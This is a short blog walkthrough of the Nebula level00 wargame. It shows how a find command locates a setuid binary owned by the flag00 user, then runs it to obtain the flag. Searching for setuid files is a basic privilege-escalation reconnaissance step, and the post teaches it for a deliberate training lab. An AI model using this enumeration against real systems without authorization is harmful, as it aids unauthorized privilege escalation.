Saturday, October 27, 2012

exploit-exercises Nebula: level00

In order to solve level00 challenge, we have to find a setuid program that will run as the "flag00" user.
Easy task, all we need is the find utility. (man find for more information)
level00@nebula:~$ find / -perm -4000 -user flag00 2> /dev/null
/bin/.../flag00
file / starts looking from the root directory.
-perm -4000 indicates that the the setuid bit should be on. Notice the dash in front of 4000, which means that the only the flipped on bits should match (e.g the file doesn't need to have 4000 permissions exactly, just the setuid bit flipped on.)
-user flag00 doesn't need much explanation.
2> /dev/null is a redirection of /dev/stderr to /dev/null. It is not necessary, but we don't care about the "Permission denied" errors, just the file we are looking for.
level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

No comments:

Post a Comment